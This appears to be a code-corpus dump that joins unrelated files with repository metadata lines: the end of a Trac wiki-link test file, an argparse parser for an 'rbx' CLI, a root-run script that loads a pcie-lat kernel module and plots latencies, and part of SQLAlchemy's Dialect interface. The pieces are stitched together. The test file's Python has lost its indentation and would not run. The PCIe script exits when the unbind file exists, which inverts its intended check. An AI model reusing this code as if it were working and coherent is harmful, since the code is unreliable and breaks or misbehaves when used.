<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">see detail?</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">see parent?</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">see other?</a>
<a class="missing wiki" href="/wiki/Other" rel="nofollow">Other?</a>
<a class="wiki" href="/wiki/Main/Sub">.</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#fragment">.</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail?param=1#fragment" rel="nofollow">Detail?</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">..?</a>
<a class="missing wiki" href="/wiki/Main?param=1#fragment" rel="nofollow">..?</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">Other?</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#fragment" rel="nofollow">Other?</a>
<a class="missing wiki" href="/wiki/Other" rel="nofollow">Other?</a>
</p>
------------------------------
============================== Relative to the current page, as CamelCase
OnePage/SubPage
./SubPage
../SiblingPage
.././../HigherPage
/TopPage
------------------------------
<p>
<a class="missing wiki" href="/wiki/Main/OnePage/SubPage" rel="nofollow">OnePage/SubPage?</a>
<a class="missing wiki" href="/wiki/Main/Sub/SubPage" rel="nofollow">./SubPage?</a>
<a class="missing wiki" href="/wiki/Main/SiblingPage" rel="nofollow">../SiblingPage?</a>
<a class="missing wiki" href="/wiki/HigherPage" rel="nofollow">.././../HigherPage?</a>
<a class="missing wiki" href="/wiki/TopPage" rel="nofollow">/TopPage?</a>
</p>
------------------------------
============================== Relative to the current page with query strings and fragments
[#topic see topic]
[?param=1#topic see topic]
[.#topic see topic]
[.?param=1#topic see topic]
[./#topic see topic]
[./?param=1#topic see topic]
[./Detail#topic see detail]
[./Detail?param=1#topic see detail]
[./Detail?param=1#topic]
[..#topic see parent]
[..?param=1#topic see parent]
[../#topic see parent]
[../?param=1#topic see parent]
[../Other#topic see other]
[../Other?param=1#topic see other]
[../Other?param=1#topic]
[../Other/#topic see other]
[../Other/?param=1#topic see other]
------------------------------
<p>
<a class="wiki" href="/wiki/Main/Sub#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#topic">see topic</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail#topic" rel="nofollow">see detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail?param=1#topic" rel="nofollow">see detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail?param=1#topic" rel="nofollow">Detail?</a>
<a class="missing wiki" href="/wiki/Main#topic" rel="nofollow">see parent?</a>
<a class="missing wiki" href="/wiki/Main?param=1#topic" rel="nofollow">see parent?</a>
<a class="missing wiki" href="/wiki/Main#topic" rel="nofollow">see parent?</a>
<a class="missing wiki" href="/wiki/Main?param=1#topic" rel="nofollow">see parent?</a>
<a class="missing wiki" href="/wiki/Main/Other#topic" rel="nofollow">see other?</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#topic" rel="nofollow">see other?</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#topic" rel="nofollow">Other?</a>
<a class="missing wiki" href="/wiki/Main/Other#topic" rel="nofollow">see other?</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#topic" rel="nofollow">see other?</a>
</p>
------------------------------
""" # "
SPLIT_PAGE_NAMES_TESTS = u"""
============================== Splitting relative links
[//WikiPage]
[/WikiPage]
[./WikiPage]
[../WikiPage]
[//WikiPage?param=1#fragment]
[/WikiPage?param=1#fragment]
[./WikiPage?param=1#fragment]
[../WikiPage?param=1#fragment]
But not [./wiki_page]
And not [../WikiPage WikiPage]
------------------------------
<p>
<a href="/WikiPage">Wiki Page</a>
<a href="/WikiPage">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a href="/WikiPage?param=1#fragment">Wiki Page</a>
<a href="/WikiPage?param=1#fragment">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
But not <a class="missing wiki" href="/wiki/Main/Sub/wiki_page" rel="nofollow">wiki_page?</a>
And not <a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">WikiPage?</a>
</p>
------------------------------
============================== Splitting scoped links
[wiki:WikiPage]
[wiki:./WikiPage]
[wiki:../WikiPage]
[wiki:./.././WikiPage]
[wiki:"./.././WikiPage"]
[wiki:WikiPage?param=1#fragment]
[wiki:./WikiPage?param=1#fragment]
[wiki:../WikiPage?param=1#fragment]
But not [wiki:./wiki_page]
And not [wiki:../WikiPage WikiPage]
------------------------------
<p>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
But not <a class="missing wiki" href="/wiki/Main/Sub/wiki_page" rel="nofollow">wiki_page?</a>
And not <a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">WikiPage?</a>
</p>
------------------------------
============================== Splitting internal free links
["WikiPage"]
["./WikiPage"]
["../WikiPage"]
["./.././WikiPage"]
["WikiPage?param=1#fragment"]
["./WikiPage?param=1#fragment"]
["../WikiPage?param=1#fragment"]
But not ["./wiki_page"]
And not ["../WikiPage" WikiPage]
------------------------------
<p>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
But not <a class="missing wiki" href="/wiki/Main/Sub/wiki_page" rel="nofollow">wiki_page?</a>
And not <a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">WikiPage?</a>
</p>
------------------------------
""" # "
SCOPED_LINKS_TESTS = u"""
============================== Scoped links for hierarchical pages
ThirdLevel
[wiki:ThirdLevel]
OtherThirdLevel
[wiki:OtherThirdLevel]
SecondLevel/OtherThirdLevel
[wiki:SecondLevel/OtherThirdLevel]
SecondLevel
[wiki:SecondLevel]
FirstLevel
[wiki:FirstLevel]
TestPage
[wiki:TestPage]
MissingPage
[wiki:MissingPage]
FirstLevel/MissingPage
[wiki:FirstLevel/MissingPage]
SecondLevel/MissingPage
[wiki:SecondLevel/MissingPage]
MissingFirstLevel/MissingPage
[wiki:MissingFirstLevel/MissingPage]
["/OtherThirdLevel"]
[wiki:/OtherThirdLevel]
[wiki:/OtherThirdLevel /OtherThirdLevel]
------------------------------
<p>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/ThirdLevel">ThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/ThirdLevel">ThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">SecondLevel/OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">SecondLevel/OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel">SecondLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel">SecondLevel</a>
<a class="wiki" href="/wiki/FirstLevel">FirstLevel</a>
<a class="wiki" href="/wiki/FirstLevel">FirstLevel</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/MissingPage" rel="nofollow">FirstLevel/MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/MissingPage" rel="nofollow">FirstLevel/MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">SecondLevel/MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">SecondLevel/MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingFirstLevel/MissingPage" rel="nofollow">MissingFirstLevel/MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingFirstLevel/MissingPage" rel="nofollow">MissingFirstLevel/MissingPage?</a>
<a class="missing wiki" href="/wiki/OtherThirdLevel" rel="nofollow">OtherThirdLevel?</a>
<a class="missing wiki" href="/wiki/OtherThirdLevel" rel="nofollow">OtherThirdLevel?</a>
<a class="missing wiki" href="/wiki/OtherThirdLevel" rel="nofollow">/OtherThirdLevel?</a>
</p>
------------------------------
""" # "
def wiki_setup(tc):
tc.env.config.set('wiki', 'render_unsafe_content', True) # for #9712
now = datetime.now(utc)
wiki0 = WikiPage(tc.env)
wiki0.name = 'Main/Sub'
wiki0.text = '--'
wiki0.save('joe', 'subpage', '::1', now)
wiki1 = WikiPage(tc.env)
wiki1.name = 'TestPage'
wiki1.text = '--'
wiki1.save('joe', 'normal WikiPageNames', '::1', now)
wiki2 = WikiPage(tc.env)
wiki2.name = 'Space 1 23'
wiki2.text = '--'
wiki2.save('joe', 'not a WikiPageNames', '::1', now)
wiki3 = WikiPage(tc.env)
wiki3.name = u"C'est l'\xe9t\xe9"
wiki3.text = '--'
wiki3.save('joe', 'unicode WikiPageNames', '::1', now)
imt = WikiPage(tc.env)
imt.name = u"InterMapTxt"
imt.text = """
This is the InterMapTxt
----
{{{
MeatBall http://www.usemod.com/cgi-bin/mb.pl? # $1 in MeatBall...
tsvn tsvn:
complex http://server/$1/page/$2?format=txt # resource $2 in $1
over http://unused/? # Overridden in trac.ini
}}}
----
{{{
nolink http://noweb
}}}
"""
imt.save('joe', 'test InterWiki links', '::1', now)
tc.env.config.set('interwiki', 'inter',
'http://inter/$1/page/$2 Resource $2 in $1')
tc.env.config.set('interwiki', 'over',
'http://over/$1/page/$2')
w = WikiPage(tc.env)
w.name = 'FirstLevel'
w.text = '--'
w.save('joe', 'first level of hierarchy', '::1', now)
w = WikiPage(tc.env)
w.name = 'FirstLevel/SecondLevel'
w.text = '--'
w.save('joe', 'second level of hierarchy', '::1', now)
w = WikiPage(tc.env)
w.name = 'FirstLevel/SecondLevel/ThirdLevel'
w.text = '--'
w.save('joe', 'third level of hierarchy', '::1', now)
w = WikiPage(tc.env)
w.name = 'FirstLevel/SecondLevel/OtherThirdLevel'
w.text = '--'
w.save('joe', 'other third level of hierarchy', '::1', now)
def wiki_teardown(tc):
tc.env.reset_db()
def wiki_setup_split(tc):
tc.env.config.set('wiki', 'split_page_names', 'true')
wiki_setup(tc)
def suite():
suite = unittest.TestSuite()
suite.addTest(formatter.suite(TEST_CASES, wiki_setup, __file__,
wiki_teardown))
suite.addTest(formatter.suite(RELATIVE_LINKS_TESTS, wiki_setup, __file__,
wiki_teardown,
context=('wiki', 'Main/Sub')))
suite.addTest(formatter.suite(SPLIT_PAGE_NAMES_TESTS, wiki_setup_split,
__file__, wiki_teardown,
context=('wiki', 'Main/Sub')))
suite.addTest(formatter.suite(SCOPED_LINKS_TESTS, wiki_setup, __file__,
wiki_teardown,
context=('wiki',
'FirstLevel/SecondLevel/ThirdLevel')))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
bsd-3-clause
| 8,973,763,177,520,281,000 | 43.363032 | 346 | 0.642247 | false |
jexhson/rbx
|
rbx/parser/component.py
|
1
|
4537
|
from .base import RbxBaseParser
class RbxComponentParser(RbxBaseParser):
def build_parser(self):
parser = self.subparsers.add_parser('component',
help='Manage Run in the Box components')
parser.add_argument('name',
help='Component\'s name to work on')
self.component_subparsers = parser.add_subparsers(dest='action')
self.create_component_parser()
self.configure_component_parser()
self.set_component_description_parser()
self.manage_component_rights_parser()
self.change_component_visibility_parser()
self.component_details_parser()
def create_component_parser(self):
parser = self.component_subparsers.add_parser('create',
help='Create a new component')
parser.add_argument('kind',
help='Component kind')
parser.add_argument('image',
help='Docker image name on index.docker.io')
def configure_component_parser(self):
parser = self.component_subparsers.add_parser('set',
help='Configure component')
self.component_config_subparser = parser.add_subparsers(
dest='configurator')
self.configure_component_port_parser()
self.configure_component_volume_parser()
self.configure_component_command_parser()
self.configure_component_image_parser()
def configure_component_port_parser(self):
parser = self.component_config_subparser.add_parser('port',
help='Configure component\'s port')
parser.add_argument('number',
help='Container port number',
type=int)
parser.add_argument('-d', '--description',
help='Port usage description')
parser.add_argument('-r', '--remove',
help='Remove port',
default=False,
action='store_true')
def configure_component_volume_parser(self):
parser = self.component_config_subparser.add_parser('volume',
help='Configure component\'s volume')
parser.add_argument('path',
help='Container volume path')
parser.add_argument('-d', '--description',
help='Volume usage description')
parser.add_argument('-r', '--remove',
help='Remove volume',
default=False,
action='store_true')
def configure_component_image_parser(self):
parser = self.component_config_subparser.add_parser('image',
help='Configure component\'s image')
parser.add_argument('image',
help='Container image')
def configure_component_command_parser(self):
parser = self.component_config_subparser.add_parser('command',
help='Container command to run on startup')
parser.add_argument('command',
help='Container command')
def set_component_description_parser(self):
parser = self.component_subparsers.add_parser('describe',
help='Set component description')
parser.add_argument('description',
help='Component description')
def manage_component_rights_parser(self):
self.grant_component_rights_parser()
self.revoke_component_rights_parser()
def grant_component_rights_parser(self):
parser = self.component_subparsers.add_parser('grant',
help='Grant component\'s rights on users')
parser.add_argument('rights',
help='Granted rights type',
choices=['viewer', 'contributor', 'administrator'])
parser.add_argument('user',
help='User to grant rights on',
nargs='+')
def revoke_component_rights_parser(self):
parser = self.component_subparsers.add_parser('revoke',
help='Revoke users from a component regardless of its rights')
parser.add_argument('user',
help='User to be revoked',
nargs='+')
def change_component_visibility_parser(self):
parser = self.component_subparsers.add_parser('mark',
help='Change component visibility')
parser.add_argument('visibility',
help='New component visibility',
choices=['public', 'private'])
def component_details_parser(self):
parser = self.component_subparsers.add_parser('details',
help='Display component information and configuration')
parser.add_argument('-i', '--inspect',
help='Show raw component configuration',
action='store_true')
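# Illustrative invocations this parser accepts (the executable name `rbx`
# is assumed here, not defined in this module):
#   rbx component web create container nginx
#   rbx component web set port 80 -d "HTTP traffic"
#   rbx component web grant viewer alice bob
#   rbx component web mark public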
|
gpl-2.0
| 4,179,731,277,519,826,000 | 38.452174 | 73 | 0.623099 | false |
andre-richter/pcie-lat
|
all_in_one.py
|
1
|
6054
|
#!/usr/bin/python
import sys
import os
import numpy as np
import matplotlib
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
import subprocess
import traceback
pci_dev ={
"name" : "",
"loc" : "",
"class" : "",
"vender" : "",
"device" : "",
"vd" : "",
"isBridge" : 1,
"driver" : ""
}
def is_root():
return os.geteuid() == 0
def get_pci_list():
out = subprocess.Popen(['lspci', '-nm'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = out.communicate()
lspci_str = stdout.decode('ascii')
pci_list = []
pcis = lspci_str.split('\n')
for each_pci in pcis:
pci = {}
__ = each_pci.split(" ")
if len(__) < 4:
continue
pci["loc"] = __[0].replace('"', '')
pci["vender"] = __[2].replace('"', '')
pci["device"] = __[3].replace('"', '')
pci["vd"] = ":".join([pci["vender"], pci["device"]])
out = subprocess.Popen(['lspci', '-s', '{}'.format(pci["loc"]), "-mvk"],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = out.communicate()
ss = stdout.decode('ascii')
for line in ss.split("\n"):
if ': ' in line:
k, v = line.split(": ")
if k.strip() == "Class":
pci['class'] = v.strip().replace('"', '')
elif k.strip() == "Vendor":
pci['vender'] = v.strip().replace('"', '')
elif k.strip() == "Device" and ss.split("\n").index(line) > 0:
pci['device'] = v.strip().replace('"', '')
elif k.strip() == "Driver":
pci['driver'] = v.strip().replace('"', '')
else:
pass
else:
continue
pci_list.append(pci)
return pci_list
def print_mach_info(tsc_freq, tsc_overhead, loops):
print("-------------------------------")
print(" tsc_freq : {}".format(tsc_freq))
print(" tsc_overhead : {} clocks".format(tsc_overhead))
print(" loops : {}".format(loops))
print("-------------------------------")
def clock2ns(clocks, tsc_freq):
return int(clocks*1000000000/tsc_freq)
def plot_y(y, fname):
num_width = 10
ymin = int(min(y))-1
ymax = int(max(y))+1
print("Max. and Min. latencies are {}ns {}ns".format(ymax, ymin))
margin = max(num_width, 5)
bins = [ii for ii in range(ymin-margin, ymax+margin, num_width)]
plt.yscale('log')
n, bins, patches = plt.hist(y, bins, range=(min(y), max(y)), width=10, color='blue')
plt.xlabel('nanoseconds')
plt.ylabel('Probability')
plt.title('Histogram of PCIe latencies (%s samples)' % len(y))
plt.savefig(fname, dpi=200, format='png')
def main():
loops = 0
if len(sys.argv) < 2:
print("Usage: {} [0000]:XX:XX.X [loops]".format(sys.argv[0]))
exit(-1)
else:
pci_test = sys.argv[1]
if pci_test.startswith('0000:'):
pci_test = pci_test[5:]  # strip the leading '0000:' domain prefix
if len(sys.argv) == 3:
loops = int(sys.argv[2])
else:
loops = 100000
### must be root to run the script
if not is_root():
print("Need root privillege! run as root!")
exit(-1)
### get all devices in this computer
pcis = get_pci_list()
if pci_test not in [pp['loc'] for pp in pcis]:
print("existing PCI devices:")
for __ in pcis:
print(__)
print("{} not found!".format(pci_test))
exit(-1)
for p in pcis:
if p['loc'] == pci_test:
pci_test = p
unbind_file = "/sys/bus/pci/devices/0000\:{}/driver/unbind"
unbind_file = unbind_file.format(pci_test['loc'].replace(':', '\:'))
if os.path.exists(unbind_file):
print("Unbind file {} not found!".format(unbind_file))
exit(-1)
unbind_ss = 'echo -n "0000:{}" > {}'.format(pci_test['loc'], unbind_file)
os.system(unbind_ss)
# insert module
os.system("make")
print("finished compiling the pcie-lat, insmod...");
ins_command = "sudo insmod ./pcie-lat.ko ids={}".format(pci_test['vd'])
print(ins_command)
os.system(ins_command)
# couting
try:
sys_path_head = "/sys/bus/pci/devices/0000:{}/pcie-lat/{}/pcielat_"
sys_path_head = sys_path_head.format(pci_test['loc'], pci_test['loc'])
tsc_freq = 0
tsc_overhead = 0
with open(sys_path_head+'tsc_freq', 'r') as __:
tsc_freq = int(float(__.read()))
with open(sys_path_head+'tsc_overhead', 'r') as __:
tsc_overhead = int(float(__.read()))
with open(sys_path_head+'loops', 'w') as __:
__.write(str(loops))
with open(sys_path_head+'target_bar', 'w') as __:
__.write('0')
print_mach_info(tsc_freq, tsc_overhead, loops)
with open(sys_path_head+'measure', 'w') as __:
__.write('0')
with open('/dev/pcie-lat/{}'.format(pci_test['loc']), 'rb') as __:
y = []
cc = __.read(16)
while cc:
acc = 0
acc2 = 0
for ii in range(8):
acc = acc*256 + int(cc[7-ii])
acc2 = acc2*256 + int(cc[15-ii])
y.append(clock2ns(acc2, tsc_freq))
# read next
cc = __.read(16)
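# Note: the two 8-byte little-endian counters assembled above could
# equivalently be decoded with struct.unpack('<QQ', cc); struct is not
# imported in this script, so that is an illustrative alternative only.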
fname = "pcie_lat_loops{}_{}.png"
fname = fname.format(loops, pci_test['loc'].replace(':', '..'))
print("plot the graph")
plot_y(y, fname)
except Exception:
traceback.print_exc()
print("Removing module : sudo rmmod pcie-lat.ko")
os.system("sudo rmmod pcie-lat.ko")
exit(-1)
# remove module
print("Removing module : sudo rmmod pcie-lat.ko")
os.system("sudo rmmod pcie-lat.ko")
if __name__ == "__main__":
main()
|
gpl-2.0
| -6,173,611,715,893,738,000 | 31.202128 | 88 | 0.49042 | false |
michaelBenin/sqlalchemy
|
lib/sqlalchemy/engine/interfaces.py
|
1
|
30297
|
# engine/interfaces.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Define core interfaces used by the engine system."""
from .. import util, event
# backwards compat
from ..sql.compiler import Compiled, TypeCompiler
class Dialect(object):
"""Define the behavior of a specific database and DB-API combination.
Any aspect of metadata definition, SQL query generation,
execution, result-set handling, or anything else which varies
between databases is defined under the general category of the
Dialect. The Dialect acts as a factory for other
database-specific object implementations including
ExecutionContext, Compiled, DefaultGenerator, and TypeEngine.
All Dialects implement the following attributes:
name
identifying name for the dialect from a DBAPI-neutral point of view
(i.e. 'sqlite')
driver
identifying name for the dialect's DBAPI
positional
True if the paramstyle for this Dialect is positional.
paramstyle
the paramstyle to be used (some DB-APIs support multiple
paramstyles).
convert_unicode
True if Unicode conversion should be applied to all ``str``
types.
encoding
type of encoding to use for unicode, usually defaults to
'utf-8'.
statement_compiler
a :class:`.Compiled` class used to compile SQL statements
ddl_compiler
a :class:`.Compiled` class used to compile DDL statements
server_version_info
a tuple containing a version number for the DB backend in use.
This value is only available for supporting dialects, and is
typically populated during the initial connection to the database.
default_schema_name
the name of the default schema. This value is only available for
supporting dialects, and is typically populated during the
initial connection to the database.
execution_ctx_cls
a :class:`.ExecutionContext` class used to handle statement execution
execute_sequence_format
either the 'tuple' or 'list' type, depending on what cursor.execute()
accepts for the second argument (they vary).
preparer
a :class:`~sqlalchemy.sql.compiler.IdentifierPreparer` class used to
quote identifiers.
supports_alter
``True`` if the database supports ``ALTER TABLE``.
max_identifier_length
The maximum length of identifier names.
supports_unicode_statements
Indicate whether the DB-API can receive SQL statements as Python
unicode strings
supports_unicode_binds
Indicate whether the DB-API can receive string bind parameters
as Python unicode strings
supports_sane_rowcount
Indicate whether the dialect properly implements rowcount for
``UPDATE`` and ``DELETE`` statements.
supports_sane_multi_rowcount
Indicate whether the dialect properly implements rowcount for
``UPDATE`` and ``DELETE`` statements when executed via
executemany.
preexecute_autoincrement_sequences
True if 'implicit' primary key functions must be executed separately
in order to get their value. This is currently oriented towards
Postgresql.
implicit_returning
use RETURNING or equivalent during INSERT execution in order to load
newly generated primary keys and other column defaults in one execution,
which are then available via inserted_primary_key.
If an insert statement has returning() specified explicitly,
the "implicit" functionality is not used and inserted_primary_key
will not be available.
dbapi_type_map
A mapping of DB-API type objects present in this Dialect's
DB-API implementation mapped to TypeEngine implementations used
by the dialect.
This is used to apply types to result sets based on the DB-API
types present in cursor.description; it only takes effect for
result sets against textual statements where no explicit
typemap was present.
colspecs
A dictionary of TypeEngine classes from sqlalchemy.types mapped
to subclasses that are specific to the dialect class. This
dictionary is class-level only and is not accessed from the
dialect instance itself.
supports_default_values
Indicates if the construct ``INSERT INTO tablename DEFAULT
VALUES`` is supported
supports_sequences
Indicates if the dialect supports CREATE SEQUENCE or similar.
sequences_optional
If True, indicates if the "optional" flag on the Sequence() construct
should signal to not generate a CREATE SEQUENCE. Applies only to
dialects that support sequences. Currently used only to allow Postgresql
SERIAL to be used on a column that specifies Sequence() for usage on
other backends.
supports_native_enum
Indicates if the dialect supports a native ENUM construct.
This will prevent types.Enum from generating a CHECK
constraint when that type is used.
supports_native_boolean
Indicates if the dialect supports a native boolean construct.
This will prevent types.Boolean from generating a CHECK
constraint when that type is used.
"""
_has_events = False
def create_connect_args(self, url):
"""Build DB-API compatible connection arguments.
Given a :class:`~sqlalchemy.engine.url.URL` object, returns a tuple
consisting of a `*args`/`**kwargs` suitable to send directly
to the dbapi's connect function.
"""
raise NotImplementedError()
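# A minimal sketch of a concrete implementation (illustrative only; it
# mirrors the pattern used by several built-in dialects, where
# translate_connect_args maps URL attributes onto the DBAPI's keyword names):
#
# def create_connect_args(self, url):
#     opts = url.translate_connect_args(username='user')
#     opts.update(url.query)
#     return [], opts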
@classmethod
def type_descriptor(cls, typeobj):
"""Transform a generic type to a dialect-specific type.
Dialect classes will usually use the
:func:`.types.adapt_type` function in the types module to
accomplish this.
The returned result is cached *per dialect class* so can
contain no dialect-instance state.
"""
raise NotImplementedError()
def initialize(self, connection):
"""Called during strategized creation of the dialect with a
connection.
Allows dialects to configure options based on server version info or
other properties.
The connection passed here is a SQLAlchemy Connection object,
with full capabilities.
The initialize() method of the base dialect should be called via
super().
"""
pass
def reflecttable(self, connection, table, include_columns, exclude_columns):
"""Load table description from the database.
Given a :class:`.Connection` and a
:class:`~sqlalchemy.schema.Table` object, reflect its columns and
properties from the database.
The implementation of this method is provided by
:meth:`.DefaultDialect.reflecttable`, which makes use of
:class:`.Inspector` to retrieve column information.
Dialects should **not** seek to implement this method, and should
instead implement individual schema inspection operations such as
:meth:`.Dialect.get_columns`, :meth:`.Dialect.get_pk_constraint`,
etc.
"""
raise NotImplementedError()
def get_columns(self, connection, table_name, schema=None, **kw):
"""Return information about columns in `table_name`.
Given a :class:`.Connection`, a string
`table_name`, and an optional string `schema`, return column
information as a list of dictionaries with these keys:
name
the column's name
type
[sqlalchemy.types#TypeEngine]
nullable
boolean
default
the column's default value
autoincrement
boolean
sequence
a dictionary of the form
{'name' : str, 'start' :int, 'increment': int}
Additional column attributes may be present.
"""
raise NotImplementedError()
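# An illustrative (hypothetical) return value for a two-column table,
# using types from sqlalchemy.types:
#
# [{'name': 'id', 'type': Integer(), 'nullable': False,
#   'default': None, 'autoincrement': True},
#  {'name': 'email', 'type': String(length=255), 'nullable': True,
#   'default': None, 'autoincrement': False}]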
def get_primary_keys(self, connection, table_name, schema=None, **kw):
"""Return information about primary keys in `table_name`.
Deprecated. This method is only called by the default
implementation of :meth:`.Dialect.get_pk_constraint`. Dialects should
instead implement the :meth:`.Dialect.get_pk_constraint` method directly.
"""
raise NotImplementedError()
def get_pk_constraint(self, connection, table_name, schema=None, **kw):
"""Return information about the primary key constraint on
`table_name`.
Given a :class:`.Connection`, a string
`table_name`, and an optional string `schema`, return primary
key information as a dictionary with these keys:
constrained_columns
a list of column names that make up the primary key
name
optional name of the primary key constraint.
"""
raise NotImplementedError()
def get_foreign_keys(self, connection, table_name, schema=None, **kw):
"""Return information about foreign_keys in `table_name`.
Given a :class:`.Connection`, a string
`table_name`, and an optional string `schema`, return foreign
key information as a list of dicts with these keys:
name
the constraint's name
constrained_columns
a list of column names that make up the foreign key
referred_schema
the name of the referred schema
referred_table
the name of the referred table
referred_columns
a list of column names in the referred table that correspond to
constrained_columns
"""
raise NotImplementedError()
def get_table_names(self, connection, schema=None, **kw):
"""Return a list of table names for `schema`."""
raise NotImplementedError
def get_view_names(self, connection, schema=None, **kw):
"""Return a list of all view names available in the database.
schema:
Optional, retrieve names from a non-default schema.
"""
raise NotImplementedError()
def get_view_definition(self, connection, view_name, schema=None, **kw):
"""Return view definition.
Given a :class:`.Connection`, a string
`view_name`, and an optional string `schema`, return the view
definition.
"""
raise NotImplementedError()
def get_indexes(self, connection, table_name, schema=None, **kw):
"""Return information about indexes in `table_name`.
Given a :class:`.Connection`, a string
`table_name` and an optional string `schema`, return index
information as a list of dictionaries with these keys:
name
the index's name
column_names
list of column names in order
unique
boolean
"""
raise NotImplementedError()
def get_unique_constraints(self, connection, table_name, schema=None, **kw):
"""Return information about unique constraints in `table_name`.
Given a string `table_name` and an optional string `schema`, return
unique constraint information as a list of dicts with these keys:
name
the unique constraint's name
column_names
list of column names in order
\**kw
other options passed to the dialect's get_unique_constraints() method.
.. versionadded:: 0.9.0
"""
raise NotImplementedError()
def normalize_name(self, name):
"""convert the given name to lowercase if it is detected as
case insensitive.
this method is only used if the dialect defines
requires_name_normalize=True.
"""
raise NotImplementedError()
def denormalize_name(self, name):
"""convert the given name to a case insensitive identifier
for the backend if it is an all-lowercase name.
this method is only used if the dialect defines
requires_name_normalize=True.
"""
raise NotImplementedError()
def has_table(self, connection, table_name, schema=None):
"""Check the existence of a particular table in the database.
Given a :class:`.Connection` object and a string
`table_name`, return True if the given table (possibly within
the specified `schema`) exists in the database, False
otherwise.
"""
raise NotImplementedError()
def has_sequence(self, connection, sequence_name, schema=None):
"""Check the existence of a particular sequence in the database.
Given a :class:`.Connection` object and a string
`sequence_name`, return True if the given sequence exists in
the database, False otherwise.
"""
raise NotImplementedError()
def _get_server_version_info(self, connection):
"""Retrieve the server version info from the given connection.
This is used by the default implementation to populate the
"server_version_info" attribute and is called exactly
once upon first connect.
"""
raise NotImplementedError()
def _get_default_schema_name(self, connection):
"""Return the string name of the currently selected schema from
the given connection.
This is used by the default implementation to populate the
"default_schema_name" attribute and is called exactly
